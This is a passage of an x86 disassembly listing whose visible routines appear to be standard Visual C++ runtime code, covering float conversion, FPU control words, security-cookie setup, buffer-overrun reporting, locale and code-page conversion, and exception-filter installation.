movzx eax, word ptr [eax]
shl eax, 10h
and edi, 7FFFh
sub edi, 3FFFh
cmp edi, 0FFFFC001h
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
mov [ebp+var_8], ecx
push eax
jnz short loc_41C4F2
xor ebx, ebx
call sub_41C3F5
test eax, eax
pop ecx
jnz loc_41C5A1
lea edi, [ebp+var_C]
stosd
stosd
stosd
loc_41C4EA: ; CODE XREF: sub_41C489+DA�j
push 2
pop eax
jmp loc_41C5A3
; ---------------------------------------------------------------------------
loc_41C4F2: ; CODE XREF: sub_41C489+49�j
lea eax, [ebp+var_18]
push eax
call sub_41C3DA
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41C368
add esp, 10h
test eax, eax
jz short loc_41C50F
inc edi
loc_41C50F: ; CODE XREF: sub_41C489+83�j
mov eax, [esi+4]
mov ecx, eax
sub ecx, [esi+8]
cmp edi, ecx
jge short loc_41C525
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
jmp short loc_41C561
; ---------------------------------------------------------------------------
loc_41C525: ; CODE XREF: sub_41C489+90�j
cmp edi, eax
jg short loc_41C565
sub eax, edi
mov edi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41C3DA
lea eax, [ebp+var_C]
push edi
push eax
call sub_41C40E
push dword ptr [esi+8]
lea eax, [ebp+var_C]
push eax
call sub_41C368
mov eax, [esi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41C40E
add esp, 20h
loc_41C561: ; CODE XREF: sub_41C489+9A�j
xor ebx, ebx
jmp short loc_41C4EA
; ---------------------------------------------------------------------------
loc_41C565: ; CODE XREF: sub_41C489+9E�j
cmp edi, [esi]
push dword ptr [esi+0Ch]
jl short loc_41C58D
xor eax, eax
lea edi, [ebp+var_C]
stosd
stosd
stosd
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41C40E
mov ebx, [esi+14h]
add ebx, [esi]
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_41C5A3
; ---------------------------------------------------------------------------
loc_41C58D: ; CODE XREF: sub_41C489+E1�j
mov ebx, [esi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add ebx, edi
call sub_41C40E
pop ecx
pop ecx
loc_41C5A1: ; CODE XREF: sub_41C489+55�j
xor eax, eax
loc_41C5A3: ; CODE XREF: sub_41C489+64�j
; sub_41C489+102�j
push 1Fh
pop ecx
sub ecx, [esi+0Ch]
mov esi, [esi+10h]
shl ebx, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
or ebx, [ebp+var_C]
cmp esi, 40h
jnz short loc_41C5D2
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_41C5DC
; ---------------------------------------------------------------------------
loc_41C5D2: ; CODE XREF: sub_41C489+13A�j
cmp esi, 20h
jnz short loc_41C5DC
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_41C5DC: ; CODE XREF: sub_41C489+147�j
; sub_41C489+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C489 endp
; =============== S U B R O U T I N E =======================================
sub_41C5E1 proc near ; CODE XREF: sub_41C60D+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42D1B0
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41C489
add esp, 0Ch
retn
sub_41C5E1 endp
; =============== S U B R O U T I N E =======================================
sub_41C5F7 proc near ; CODE XREF: sub_41C650+2E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_42D1C8
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41C489
add esp, 0Ch
retn
sub_41C5F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C60D proc near ; CODE XREF: sub_417EB8+12�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42CE38
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_41DC67
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41C5E1
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_4182D6
leave
retn
sub_41C60D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C650 proc near ; CODE XREF: sub_417EB8+2D�p
var_14 = byte ptr -14h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42CE38
xor eax, [ebp+4]
mov [ebp+var_4], eax
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_14]
push eax
call sub_41DC67
push [ebp+arg_0]
lea eax, [ebp+var_14]
push eax
call sub_41C5F7
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 24h
call sub_4182D6
leave
retn
sub_41C650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C693 proc near ; CODE XREF: sub_417FC1+4D�p
; sub_4180D1+41�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
mov ecx, [edx+0Ch]
push ebx
mov ebx, [ebp+arg_4]
test ebx, ebx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
mov eax, edi
jle short loc_41C6D0
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41C6B6: ; CODE XREF: sub_41C693+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41C6C2
movsx edx, dl
inc ecx
jmp short loc_41C6C5
; ---------------------------------------------------------------------------
loc_41C6C2: ; CODE XREF: sub_41C693+27�j
push 30h
pop edx
loc_41C6C5: ; CODE XREF: sub_41C693+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41C6B6
mov edx, [ebp+arg_8]
loc_41C6D0: ; CODE XREF: sub_41C693+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41C6E9
cmp byte ptr [ecx], 35h
jl short loc_41C6E9
jmp short loc_41C6E1
; ---------------------------------------------------------------------------
loc_41C6DE: ; CODE XREF: sub_41C693+52�j
mov byte ptr [eax], 30h
loc_41C6E1: ; CODE XREF: sub_41C693+49�j
dec eax
cmp byte ptr [eax], 39h
jz short loc_41C6DE
inc byte ptr [eax]
loc_41C6E9: ; CODE XREF: sub_41C693+42�j
; sub_41C693+47�j
cmp byte ptr [esi], 31h
jnz short loc_41C6F3
inc dword ptr [edx+4]
jmp short loc_41C705
; ---------------------------------------------------------------------------
loc_41C6F3: ; CODE XREF: sub_41C693+59�j
push edi
call sub_416000
inc eax
push eax
push edi
push esi
call sub_41BC70
add esp, 10h
loc_41C705: ; CODE XREF: sub_41C693+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41C693 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C70A proc near ; CODE XREF: sub_41C7C4+1B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
push ebx
push esi
push edi
mov edi, 7FFh
mov esi, 80000000h
mov [ebp+var_4], esi
mov ecx, eax
shr ecx, 4
and eax, 8000h
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
and eax, 0FFFFFh
test ebx, ebx
jz short loc_41C75A
cmp ebx, edi
jz short loc_41C753
lea edi, [ecx+3C00h]
jmp short loc_41C77B
; ---------------------------------------------------------------------------
loc_41C753: ; CODE XREF: sub_41C70A+3F�j
mov edi, 7FFFh
jmp short loc_41C77B
; ---------------------------------------------------------------------------
loc_41C75A: ; CODE XREF: sub_41C70A+3B�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41C772
cmp edx, ebx
jnz short loc_41C772
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41C7BF
; ---------------------------------------------------------------------------
loc_41C772: ; CODE XREF: sub_41C70A+54�j
; sub_41C70A+58�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_41C77B: ; CODE XREF: sub_41C70A+47�j
; sub_41C70A+4E�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
or ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
shl edx, 0Bh
test ecx, esi
mov [eax+4], ecx
mov [eax], edx
jnz short loc_41C7B6
loc_41C797: ; CODE XREF: sub_41C70A+AA�j
mov ecx, [eax]
mov edx, [eax+4]
mov ebx, ecx
shl edx, 1
shr ebx, 1Fh
or edx, ebx
add ecx, ecx
add edi, 0FFFFh
test edx, esi
mov [eax+4], edx
mov [eax], ecx
jz short loc_41C797
loc_41C7B6: ; CODE XREF: sub_41C70A+8B�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41C7BF: ; CODE XREF: sub_41C70A+66�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C70A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7C4 proc near ; CODE XREF: sub_417FC1+23�p
; sub_4180D1+22�p ...
var_2C = word ptr -2Ch
var_2A = byte ptr -2Ah
var_28 = byte ptr -28h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41C70A
pop ecx
pop ecx
lea eax, [ebp+var_2C]
push eax
push 0
push 11h
sub esp, 0Ch
lea esi, [ebp+var_10]
mov edi, esp
movsd
movsd
movsw
call sub_41E0A1
mov esi, [ebp+arg_8]
mov edi, [ebp+arg_C]
mov [esi+8], eax
movsx eax, [ebp+var_2A]
mov [esi], eax
movsx eax, [ebp+var_2C]
mov [esi+4], eax
lea eax, [ebp+var_28]
push eax
push edi
call sub_41B390
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 20h
mov [esi+0Ch], edi
mov eax, esi
call sub_4182D6
pop edi
pop esi
leave
retn
sub_41C7C4 endp
; =============== S U B R O U T I N E =======================================
sub_41C836 proc near ; CODE XREF: sub_414CA3+43E�p
; sub_414CA3+459�p ...
push 2
call sub_4148E1
pop ecx
retn
sub_41C836 endp
; =============== S U B R O U T I N E =======================================
sub_41C83F proc near ; CODE XREF: sub_41C95F+C�p
xor eax, eax
test bl, 1
jz short loc_41C849
push 10h
pop eax
loc_41C849: ; CODE XREF: sub_41C83F+5�j
test bl, 4
jz short loc_41C851
or eax, 8
loc_41C851: ; CODE XREF: sub_41C83F+D�j
test bl, 8
jz short loc_41C859
or eax, 4
loc_41C859: ; CODE XREF: sub_41C83F+15�j
test bl, 10h
jz short loc_41C861
or eax, 2
loc_41C861: ; CODE XREF: sub_41C83F+1D�j
test bl, 20h
jz short loc_41C869
or eax, 1
loc_41C869: ; CODE XREF: sub_41C83F+25�j
test bl, 2
jz short loc_41C873
or eax, 80000h
loc_41C873: ; CODE XREF: sub_41C83F+2D�j
push ebp
movzx edx, bx
push esi
mov ecx, edx
mov esi, 0C00h
and ecx, esi
push edi
mov edi, 300h
mov ebp, 200h
jz short loc_41C8AF
cmp ecx, 400h
jz short loc_41C8AA
cmp ecx, 800h
jz short loc_41C8A6
cmp ecx, esi
jnz short loc_41C8AF
or eax, edi
jmp short loc_41C8AF
; ---------------------------------------------------------------------------
loc_41C8A6: ; CODE XREF: sub_41C83F+5D�j
or eax, ebp
jmp short loc_41C8AF
; ---------------------------------------------------------------------------
loc_41C8AA: ; CODE XREF: sub_41C83F+55�j
or eax, 100h
loc_41C8AF: ; CODE XREF: sub_41C83F+4D�j
; sub_41C83F+61�j ...
and edx, edi
jz short loc_41C8BE
cmp edx, ebp
jnz short loc_41C8C3
or eax, 10000h
jmp short loc_41C8C3
; ---------------------------------------------------------------------------
loc_41C8BE: ; CODE XREF: sub_41C83F+72�j
or eax, 20000h
loc_41C8C3: ; CODE XREF: sub_41C83F+76�j
; sub_41C83F+7D�j
test bh, 10h
pop edi
pop esi
pop ebp
jz short locret_41C8D0
or eax, 40000h
locret_41C8D0: ; CODE XREF: sub_41C83F+8A�j
retn
sub_41C83F endp
; =============== S U B R O U T I N E =======================================
sub_41C8D1 proc near ; CODE XREF: sub_41C95F+22�p
xor eax, eax
test bl, 10h
jz short loc_41C8D9
inc eax
loc_41C8D9: ; CODE XREF: sub_41C8D1+5�j
test bl, 8
jz short loc_41C8E1
or eax, 4
loc_41C8E1: ; CODE XREF: sub_41C8D1+B�j
test bl, 4
jz short loc_41C8E9
or eax, 8
loc_41C8E9: ; CODE XREF: sub_41C8D1+13�j
test bl, 2
jz short loc_41C8F1
or eax, 10h
loc_41C8F1: ; CODE XREF: sub_41C8D1+1B�j
test bl, 1
jz short loc_41C8F9
or eax, 20h
loc_41C8F9: ; CODE XREF: sub_41C8D1+23�j
test ebx, 80000h
jz short loc_41C904
or eax, 2
loc_41C904: ; CODE XREF: sub_41C8D1+2E�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_41C938
cmp ecx, 100h
jz short loc_41C933
cmp ecx, esi
jz short loc_41C92C
cmp ecx, edx
jnz short loc_41C938
or eax, 0C00h
jmp short loc_41C938
; ---------------------------------------------------------------------------
loc_41C92C: ; CODE XREF: sub_41C8D1+4E�j
or eax, 800h
jmp short loc_41C938
; ---------------------------------------------------------------------------
loc_41C933: ; CODE XREF: sub_41C8D1+4A�j
or eax, 400h
loc_41C938: ; CODE XREF: sub_41C8D1+42�j
; sub_41C8D1+52�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_41C94E
cmp ecx, 10000h
jnz short loc_41C950
or eax, esi
jmp short loc_41C950
; ---------------------------------------------------------------------------
loc_41C94E: ; CODE XREF: sub_41C8D1+6F�j
or eax, edx
loc_41C950: ; CODE XREF: sub_41C8D1+77�j
; sub_41C8D1+7B�j
test ebx, 40000h
pop esi
jz short locret_41C95E
or eax, 1000h
locret_41C95E: ; CODE XREF: sub_41C8D1+86�j
retn
sub_41C8D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C95F proc near ; CODE XREF: sub_41C991+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
fstcw word ptr [ebp+var_4]
mov ebx, [ebp+var_4]
call sub_41C83F
mov ebx, eax
mov eax, [ebp+arg_4]
not eax
and ebx, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or ebx, eax
call sub_41C8D1
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
mov eax, ebx
pop ebx
leave
retn
sub_41C95F endp
; =============== S U B R O U T I N E =======================================
sub_41C991 proc near ; CODE XREF: sub_41822A+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_41C95F
pop ecx
pop ecx
retn
sub_41C991 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9A7 proc near ; DATA XREF: .data:0042A004�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+var_8]
push eax
call ds:dword_41F140 ; GetSystemTimeAsFileTime
mov esi, [ebp+var_4]
xor esi, [ebp+var_8]
call ds:dword_41F0D0 ; GetCurrentProcessId
xor esi, eax
call ds:dword_41F158 ; GetCurrentThreadId
xor esi, eax
call ds:dword_41F004 ; GetTickCount
xor esi, eax
lea eax, [ebp+var_10]
push eax
call ds:dword_41F124 ; QueryPerformanceCounter
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor esi, eax
mov dword_42CE38, esi
jnz short loc_41C9FA
mov dword_42CE38, 0BB40E64Eh
loc_41C9FA: ; CODE XREF: sub_41C9A7+47�j
pop esi
leave
retn
sub_41C9A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9FD proc near ; CODE XREF: sub_4182D6-1D�p
var_128 = byte ptr -128h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset stru_428738
call __SEH_prolog
mov eax, dword_42CE38
xor eax, [ebp+4]
mov [ebp+var_1C], eax
mov eax, dword_47A1BC
xor ecx, ecx
cmp eax, ecx
jz short loc_41CA41
mov [ebp+ms_exc.disabled], ecx
push [ebp+arg_4]
push [ebp+arg_0]
call eax
pop ecx
pop ecx
loc_41CA2F: ; CODE XREF: sub_41C9FD+42�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_41CB3F
; ---------------------------------------------------------------------------
loc_41CA38: ; DATA XREF: .rdata:stru_428738�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41CA3C: ; DATA XREF: .rdata:stru_428738�o
mov esp, [ebp+ms_exc.old_esp]
jmp short loc_41CA2F
; ---------------------------------------------------------------------------
loc_41CA41: ; CODE XREF: sub_41C9FD+23�j
mov eax, [ebp+arg_0]
dec eax
jz short loc_41CA5A
mov edi, offset aUnknownSecurit ; "Unknown security failure detected!"
mov [ebp+var_20], offset aASecurityError ; "A security error of unknown cause has b"...
mov esi, 0D4h
jmp short loc_41CA6B
; ---------------------------------------------------------------------------
loc_41CA5A: ; CODE XREF: sub_41C9FD+48�j
mov edi, offset aBufferOverrunD ; "Buffer overrun detected!"
mov [ebp+var_20], offset aABufferOverrun ; "A buffer overrun has been detected whic"...
mov esi, 0B9h
loc_41CA6B: ; CODE XREF: sub_41C9FD+5B�j
mov [ebp+var_24], cl
push 104h
lea eax, [ebp+var_128]
push eax
push ecx
call ds:dword_41F010 ; GetModuleFileNameA
test eax, eax
jnz short loc_41CA98
push offset aProgramNameUnk ; "<program name unknown>"
lea eax, [ebp+var_128]
push eax
call sub_41B390
pop ecx
pop ecx
loc_41CA98: ; CODE XREF: sub_41C9FD+86�j
lea ebx, [ebp+var_128]
lea eax, [ebp+var_128]
push eax
call sub_416000
pop ecx
add eax, 0Bh
cmp eax, 3Ch
jbe short loc_41CADC
lea eax, [ebp+var_128]
push eax
call sub_416000
mov ebx, eax
lea eax, [ebp+var_128]
sub eax, 31h
add ebx, eax
push 3
push offset a___ ; "..."
push ebx
call sub_412C40
add esp, 10h
loc_41CADC: ; CODE XREF: sub_41C9FD+B4�j
push ebx
call sub_416000
pop ecx
lea eax, [eax+esi+0Ch]
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov esi, esp
push edi
push esi
call sub_41B390
mov edi, offset asc_4283A8 ; "\n\n"
push edi
push esi
call sub_41B3A0
push offset dword_428594
push esi
call sub_41B3A0
push ebx
push esi
call sub_41B3A0
push edi
push esi
call sub_41B3A0
push [ebp+var_20]
push esi
call sub_41B3A0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push esi
call sub_41D75B
add esp, 3Ch
loc_41CB3F: ; CODE XREF: sub_41C9FD+36�j
push 3
call sub_414544
int 3 ; Trap to Debugger
sub_41C9FD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB47 proc near ; CODE XREF: sub_4182E4+27D�p
; sub_41AF01+15E�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_42CE38
xor eax, [ebp+4]
and [ebp+var_6], 0
push 6
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
call ds:dword_41F0F4 ; GetLocaleInfoA
test eax, eax
jnz short loc_41CB79
or eax, 0FFFFFFFFh
jmp short loc_41CB83
; ---------------------------------------------------------------------------
loc_41CB79: ; CODE XREF: sub_41CB47+2B�j
lea eax, [ebp+var_C]
push eax
call sub_412EBA
pop ecx
loc_41CB83: ; CODE XREF: sub_41CB47+30�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_4182D6
leave
retn
sub_41CB47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB90 proc near ; CODE XREF: sub_4182E4+2A8�p
; sub_4182E4+366�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 38h
push offset stru_428748
call __SEH_prolog
mov eax, dword_42CE38
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_20], edi
mov [ebp+var_24], edi
mov eax, [ebp+arg_C]
mov ebx, [eax]
mov [ebp+var_28], ebx
mov [ebp+var_2C], edi
mov eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jz loc_41CD39
lea ecx, [ebp+var_40]
push ecx
push eax
mov esi, ds:dword_41F18C
call esi ; GetCPInfo
test eax, eax
jz short loc_41CBF7
cmp [ebp+var_40], 1
jnz short loc_41CBF7
lea eax, [ebp+var_40]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_41CBF7
cmp [ebp+var_40], 1
jnz short loc_41CBF7
mov [ebp+var_2C], 1
loc_41CBF7: ; CODE XREF: sub_41CB90+45�j
; sub_41CB90+4B�j ...
cmp [ebp+var_2C], edi
jz short loc_41CC16
cmp ebx, 0FFFFFFFFh
jz short loc_41CC05
mov esi, ebx
jmp short loc_41CC11
; ---------------------------------------------------------------------------
loc_41CC05: ; CODE XREF: sub_41CB90+6F�j
push [ebp+arg_8]
call sub_416000
pop ecx
mov esi, eax
inc esi
loc_41CC11: ; CODE XREF: sub_41CB90+73�j
mov [ebp+var_44], esi
jmp short loc_41CC19
; ---------------------------------------------------------------------------
loc_41CC16: ; CODE XREF: sub_41CB90+6A�j
mov esi, [ebp+var_44]
loc_41CC19: ; CODE XREF: sub_41CB90+84�j
cmp [ebp+var_2C], edi
jnz short loc_41CC38
push edi
push edi
push ebx
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_41F0A8 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_44], esi
cmp esi, edi
jz short loc_41CC90
loc_41CC38: ; CODE XREF: sub_41CB90+8C�j
mov [ebp+ms_exc.disabled], edi
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_412DD0
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_48], ebx
lea eax, [esi+esi]
push eax
push edi
push ebx
call sub_41ADD0
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41CC7C
; ---------------------------------------------------------------------------
loc_41CC65: ; DATA XREF: .rdata:stru_428748�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41CC69: ; DATA XREF: .rdata:stru_428748�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41AE30
xor edi, edi
xor ebx, ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_44]
loc_41CC7C: ; CODE XREF: sub_41CB90+D3�j
cmp ebx, edi
jnz short loc_41CC9E
push esi
push 2
call sub_41AB01
pop ecx
pop ecx
mov ebx, eax
cmp ebx, edi
jnz short loc_41CC97
loc_41CC90: ; CODE XREF: sub_41CB90+A6�j
xor eax, eax
jmp loc_41CD4B
; ---------------------------------------------------------------------------
loc_41CC97: ; CODE XREF: sub_41CB90+FE�j
mov [ebp+var_24], 1
loc_41CC9E: ; CODE XREF: sub_41CB90+EE�j
push esi
push ebx
push [ebp+var_28]
push [ebp+arg_8]
push 1
push [ebp+arg_0]
call ds:dword_41F0A8 ; MultiByteToWideChar
test eax, eax
jz loc_41CD3C
cmp [ebp+arg_10], edi
jz short loc_41CCDE
push edi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_41F0AC ; WideCharToMultiByte
test eax, eax
jz short loc_41CD3C
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
jmp short loc_41CD3C
; ---------------------------------------------------------------------------
loc_41CCDE: ; CODE XREF: sub_41CB90+12C�j
cmp [ebp+var_2C], edi
jnz short loc_41CCF9
push edi
push edi
push edi
push edi
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_41F0AC ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_41CD3C
loc_41CCF9: ; CODE XREF: sub_41CB90+151�j
push esi
push 1
call sub_41AB01
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_41CD3C
push edi
push edi
push esi
push eax
push esi
push ebx
push edi
push [ebp+arg_4]
call ds:dword_41F0AC ; WideCharToMultiByte
cmp eax, edi
jnz short loc_41CD2C
push [ebp+var_20]
call sub_412FE4
pop ecx
mov [ebp+var_20], edi
jmp short loc_41CD3C
; ---------------------------------------------------------------------------
loc_41CD2C: ; CODE XREF: sub_41CB90+18C�j
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_41CD3C
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_41CD3C
; ---------------------------------------------------------------------------
loc_41CD39: ; CODE XREF: sub_41CB90+30�j
mov ebx, [ebp+var_48]
loc_41CD3C: ; CODE XREF: sub_41CB90+123�j
; sub_41CB90+144�j ...
cmp [ebp+var_24], edi
jz short loc_41CD48
push ebx
call sub_412FE4
pop ecx
loc_41CD48: ; CODE XREF: sub_41CB90+1AF�j
mov eax, [ebp+var_20]
loc_41CD4B: ; CODE XREF: sub_41CB90+102�j
lea esp, [ebp-54h]
mov ecx, [ebp+var_1C]
xor ecx, [ebp+4]
call sub_4182D6
call __SEH_epilog
retn
sub_41CB90 endp
; =============== S U B R O U T I N E =======================================
sub_41CD5F proc near ; DATA XREF: sub_41CDA5�o
; .data:0042CE3C�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41CD82
cmp dword ptr [eax+10h], 3
jnz short loc_41CD82
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41CD82
call sub_418F0B
loc_41CD82: ; CODE XREF: sub_41CD5F+D�j
; sub_41CD5F+13�j ...
mov eax, dword_47A1C0
test eax, eax
jz short loc_41CD9F
push eax
call sub_41CDFD
test eax, eax
pop ecx
jz short loc_41CD9F
push esi
call dword_47A1C0
jmp short loc_41CDA1
; ---------------------------------------------------------------------------
loc_41CD9F: ; CODE XREF: sub_41CD5F+2A�j
; sub_41CD5F+35�j
xor eax, eax
loc_41CDA1: ; CODE XREF: sub_41CD5F+3E�j
pop esi
retn 4
sub_41CD5F endp
; =============== S U B R O U T I N E =======================================
sub_41CDA5 proc near ; DATA XREF: .data:0042A020�o
push offset sub_41CD5F
call ds:dword_41F120 ; SetUnhandledExceptionFilter
mov dword_47A1C0, eax
xor eax, eax
retn
sub_41CDA5 endp
; =============== S U B R O U T I N E =======================================
sub_41CDB8 proc near ; DATA XREF: .data:0042A038�o
push dword_47A1C0
call ds:dword_41F120 ; SetUnhandledExceptionFilter
retn
sub_41CDB8 endp
; =============== S U B R O U T I N E =======================================
sub_41CDC5 proc near ; CODE XREF: sub_4189E4+53�p
; sub_4189E4+8D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_41F11C ; IsBadReadPtr
test eax, eax
jz short loc_41CDDD
xor esi, esi
loc_41CDDD: ; CODE XREF: sub_41CDC5+14�j
mov eax, esi
pop esi
retn
sub_41CDC5 endp
; =============== S U B R O U T I N E =======================================
sub_41CDE1 proc near ; CODE XREF: sub_4189E4+65�p
; sub_4189E4+9F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
xor esi, esi
push [esp+8+arg_0]
inc esi
call ds:dword_41F178 ; IsBadWritePtr
test eax, eax
jz short loc_41CDF9
xor esi, esi
loc_41CDF9: ; CODE XREF: sub_41CDE1+14�j
mov eax, esi
pop esi
retn
sub_41CDE1 endp
; =============== S U B R O U T I N E =======================================
sub_41CDFD proc near ; CODE XREF: sub_4189E4+128�p
; sub_41CD5F+2D�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
xor esi, esi
inc esi
